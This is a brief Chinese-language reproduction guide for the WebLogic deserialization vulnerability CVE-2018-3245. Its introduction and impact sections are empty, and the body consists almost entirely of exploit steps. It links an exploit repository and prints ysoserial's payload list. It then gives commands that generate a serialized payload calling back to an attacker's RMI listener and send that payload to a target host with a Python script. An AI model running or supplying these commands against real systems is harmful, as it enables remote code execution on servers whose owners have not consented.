(CVE-2018-3245)
一、漏洞简介
二、漏洞影响
三、复现过程
https://github.com/ianxtianxt/CVE-2018-3245
Step 1
java -jar ysoserial-cve-2018-3245.jar
WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-3245.jar [payload] '[command]'
Available payload types:
     Payload         Authors   Dependencies
     -------         -------   ------------
     CVE_2018_2893_1 @mbechler
     CVE_2018_2893_2 @mbechler
     CVE_2018_2893_3 @mbechler
     CVE_2018_3245   @mbechler
     JRMPClient      @mbechler
     Jdk7u21         @frohoff
Step 2
java -jar ysoserial-cve-2018-3245.jar  CVE_2018_3245  "[RMI_SERVICE_IP]:[PORT]"  >  poc5.ser
Step 3
python weblogic.py [TARGET_HOST] [PORT] poc5.ser